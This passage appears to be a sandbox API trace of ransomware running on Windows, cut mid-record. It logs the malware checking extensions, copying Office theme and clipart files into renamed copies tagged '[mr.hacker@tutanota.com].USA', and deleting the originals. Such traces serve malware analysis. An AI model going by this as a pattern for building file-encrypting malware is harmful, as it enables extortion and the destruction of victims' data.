(lpString1=".docx", lpString2="N.INF") returned -1 [0264.978] lstrlenW (lpString=".pdf") returned 4 [0264.978] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0264.978] lstrlenW (lpString=".xls") returned 4 [0264.978] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0264.978] lstrlenW (lpString=".xlsx") returned 5 [0264.978] lstrcmpiW (lpString1=".xlsx", lpString2="N.INF") returned -1 [0264.978] lstrlenW (lpString=".ppt") returned 4 [0264.978] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0264.978] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.978] lstrlenW (lpString=".zip") returned 4 [0264.978] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0264.978] lstrlenW (lpString=".rar") returned 4 [0264.978] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0264.978] lstrlenW (lpString=".bz2") returned 4 [0264.978] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0264.978] lstrlenW (lpString=".7z") returned 3 [0264.978] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0264.978] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.978] lstrlenW (lpString=".dbf") returned 4 [0264.978] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0264.978] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.978] lstrlenW (lpString=".1cd") returned 4 [0264.979] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0264.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 73 [0264.979] lstrlenW (lpString=".jpg") returned 4 [0264.979] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0264.979] lstrcmpiW (lpString1=".ELM", lpString2=".USA") returned -1 [0264.979] lstrlenW (lpString="CAPSULES.ELM") returned 12 [0264.979] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0264.980] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=57786) returned 1 [0264.980] CloseHandle (hObject=0x380) returned 1 [0264.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm")) returned 0x20 [0264.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.980] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.980] lstrlenW (lpString=".doc") returned 4 [0264.981] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0264.981] lstrlenW (lpString=".docx") returned 5 [0264.981] lstrcmpiW (lpString1=".docx", lpString2="S.ELM") returned -1 [0264.981] lstrlenW (lpString=".pdf") returned 4 [0264.981] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0264.981] lstrlenW (lpString=".xls") returned 4 [0264.981] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0264.981] lstrlenW (lpString=".xlsx") returned 5 [0264.981] lstrcmpiW (lpString1=".xlsx", lpString2="S.ELM") returned -1 [0264.981] lstrlenW (lpString=".ppt") returned 4 [0264.981] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0264.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.981] lstrlenW (lpString=".zip") returned 4 [0264.981] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0264.981] lstrlenW (lpString=".rar") returned 4 [0264.981] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0264.981] lstrlenW (lpString=".bz2") returned 4 [0264.981] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0264.981] lstrlenW (lpString=".7z") returned 3 [0264.981] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0264.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.981] lstrlenW (lpString=".dbf") returned 4 [0264.981] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0264.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.981] lstrlenW (lpString=".1cd") returned 4 [0264.981] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0264.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.981] lstrlenW (lpString=".jpg") returned 4 [0264.981] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0264.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.982] lstrlenW (lpString=".doc") returned 4 [0264.982] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0264.982] lstrlenW (lpString=".docx") returned 5 [0264.982] lstrcmpiW (lpString1=".docx", lpString2="S.ELM") returned -1 [0264.982] lstrlenW (lpString=".pdf") returned 4 [0264.982] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0264.982] lstrlenW (lpString=".xls") returned 4 [0264.982] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0264.982] lstrlenW (lpString=".xlsx") returned 5 [0264.982] lstrcmpiW (lpString1=".xlsx", lpString2="S.ELM") returned -1 [0264.982] lstrlenW (lpString=".ppt") returned 4 [0264.982] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0264.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.982] lstrlenW (lpString=".zip") returned 4 [0264.982] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0264.982] lstrlenW (lpString=".rar") returned 4 [0264.982] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0264.982] lstrlenW (lpString=".bz2") returned 4 [0264.982] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0264.982] lstrlenW (lpString=".7z") returned 3 [0264.982] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0264.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.982] lstrlenW (lpString=".dbf") returned 4 [0264.982] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0264.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.982] lstrlenW (lpString=".1cd") returned 4 [0264.982] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0264.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 77 [0264.983] lstrlenW (lpString=".jpg") returned 4 [0264.983] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0264.983] lstrcmpiW (lpString1=".INF", lpString2=".USA") returned -1 [0264.983] lstrlenW (lpString="CAPSULES.INF") returned 12 [0264.983] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0264.983] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=501) returned 1 [0264.983] CloseHandle (hObject=0x380) returned 1 [0264.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf")) returned 0x20 [0264.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.983] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.984] lstrlenW (lpString=".doc") returned 4 [0264.984] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0264.984] lstrlenW (lpString=".docx") returned 5 [0264.984] lstrcmpiW (lpString1=".docx", lpString2="S.INF") returned -1 [0264.984] lstrlenW (lpString=".pdf") returned 4 [0264.984] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0264.984] lstrlenW (lpString=".xls") returned 4 [0264.984] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0264.984] lstrlenW (lpString=".xlsx") returned 5 [0264.984] lstrcmpiW (lpString1=".xlsx", lpString2="S.INF") returned -1 [0264.984] lstrlenW (lpString=".ppt") returned 4 [0264.984] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0264.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.984] lstrlenW (lpString=".zip") returned 4 [0264.984] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0264.984] lstrlenW (lpString=".rar") returned 4 [0264.985] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0264.985] lstrlenW (lpString=".bz2") returned 4 [0264.985] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0264.985] lstrlenW (lpString=".7z") returned 3 [0264.985] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0264.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.985] lstrlenW (lpString=".dbf") returned 4 [0264.985] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0264.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.985] lstrlenW (lpString=".1cd") returned 4 [0264.985] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0264.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.985] lstrlenW (lpString=".jpg") returned 4 [0264.985] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0264.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.985] lstrlenW (lpString=".doc") returned 4 [0264.985] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0264.985] lstrlenW (lpString=".docx") returned 5 [0264.985] lstrcmpiW (lpString1=".docx", lpString2="S.INF") returned -1 [0264.985] lstrlenW (lpString=".pdf") returned 4 [0264.985] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0264.985] lstrlenW (lpString=".xls") returned 4 [0264.985] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0264.985] lstrlenW (lpString=".xlsx") returned 5 [0264.986] lstrcmpiW (lpString1=".xlsx", lpString2="S.INF") returned -1 [0264.986] lstrlenW (lpString=".ppt") returned 4 [0264.986] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0264.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.986] lstrlenW (lpString=".zip") returned 4 [0264.986] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0264.986] lstrlenW (lpString=".rar") returned 4 [0264.986] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0264.986] lstrlenW (lpString=".bz2") returned 4 [0264.986] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0264.986] lstrlenW (lpString=".7z") returned 3 [0264.986] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0264.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.986] lstrlenW (lpString=".dbf") returned 4 [0264.986] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0264.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.986] lstrlenW (lpString=".1cd") returned 4 [0264.986] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0264.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 77 [0264.986] lstrlenW (lpString=".jpg") returned 4 [0264.986] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0264.986] lstrcmpiW (lpString1=".ELM", lpString2=".USA") returned -1 [0264.986] lstrlenW (lpString="CASCADE.ELM") returned 11 [0264.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0264.987] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=47684) returned 1 [0264.987] CloseHandle (hObject=0x380) returned 1 [0264.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm")) returned 0x20 [0264.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 75 [0264.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 75 [0264.988] lstrlenW (lpString=".doc") returned 4 [0264.988] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0264.988] lstrlenW (lpString=".docx") returned 5 [0264.988] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0264.988] lstrlenW (lpString=".pdf") returned 4 [0264.988] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0264.988] lstrlenW (lpString=".xls") returned 4 [0264.988] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0264.988] lstrlenW (lpString=".xlsx") returned 5 [0264.988] lstrcmpiW (lpString1=".xlsx", lpString2="E.ELM") returned -1 [0264.988] lstrlenW (lpString=".ppt") returned 4 [0264.988] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0264.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 75 [0264.988] lstrlenW (lpString=".zip") returned 4 [0264.988] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0264.988] lstrlenW (lpString=".rar") returned 4 [0264.988] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0264.988] lstrlenW (lpString=".bz2") returned 4 [0264.988] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0264.988] lstrlenW (lpString=".7z") returned 3 [0264.988] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0264.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 75 [0264.988] lstrlenW (lpString=".dbf") returned 4 [0264.988] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0265.974] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0265.974] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0265.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0267.604] GetLastError () returned 0x0 [0267.604] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x1cd8, lpOverlapped=0x0) returned 1 [0267.621] WriteFile (in: hFile=0x384, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x1ce0, lpOverlapped=0x0) returned 1 [0267.622] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.622] WriteFile (in: hFile=0x384, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xea, lpOverlapped=0x0) returned 1 [0267.622] SetEndOfFile (hFile=0x384) returned 1 [0267.622] CloseHandle (hObject=0x384) returned 1 [0267.622] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.622] SetEndOfFile (hFile=0x37c) returned 1 [0267.634] CloseHandle (hObject=0x37c) returned 1 [0267.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.634] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid")) returned 1 [0267.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.634] lstrlenW (lpString=".doc") returned 4 [0267.634] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.634] lstrlenW (lpString=".docx") returned 5 [0267.634] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.634] lstrlenW (lpString=".pdf") returned 4 [0267.635] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.635] lstrlenW (lpString=".xls") returned 4 [0267.635] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.635] lstrlenW (lpString=".xlsx") returned 5 [0267.635] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.635] lstrlenW (lpString=".ppt") returned 4 [0267.635] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.635] lstrlenW (lpString=".zip") returned 4 [0267.635] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.635] lstrlenW (lpString=".rar") returned 4 [0267.635] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.635] lstrlenW (lpString=".bz2") returned 4 [0267.635] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.635] lstrlenW (lpString=".7z") returned 3 [0267.635] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.635] lstrlenW (lpString=".dbf") returned 4 [0267.635] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.635] lstrlenW (lpString=".1cd") returned 4 [0267.635] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.635] lstrlenW (lpString=".jpg") returned 4 [0267.635] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.635] lstrlenW (lpString=".doc") returned 4 [0267.635] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.636] lstrlenW (lpString=".docx") returned 5 [0267.636] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.636] lstrlenW (lpString=".pdf") returned 4 [0267.636] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.636] lstrlenW (lpString=".xls") returned 4 [0267.636] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.636] lstrlenW (lpString=".xlsx") returned 5 [0267.636] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.636] lstrlenW (lpString=".ppt") returned 4 [0267.636] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.636] lstrlenW (lpString=".zip") returned 4 [0267.636] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.636] lstrlenW (lpString=".rar") returned 4 [0267.636] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.636] lstrlenW (lpString=".bz2") returned 4 [0267.636] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.636] lstrlenW (lpString=".7z") returned 3 [0267.636] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.636] lstrlenW (lpString=".dbf") returned 4 [0267.636] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.636] lstrlenW (lpString=".1cd") returned 4 [0267.636] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0267.637] lstrlenW (lpString=".jpg") returned 4 [0267.637] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.637] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0267.637] lstrlenW (lpString="HTECH_01.MID") returned 12 [0267.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0267.637] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=7178) returned 1 [0267.637] CloseHandle (hObject=0x37c) returned 1 [0267.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid")) returned 0x20 [0267.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0267.638] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.638] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft 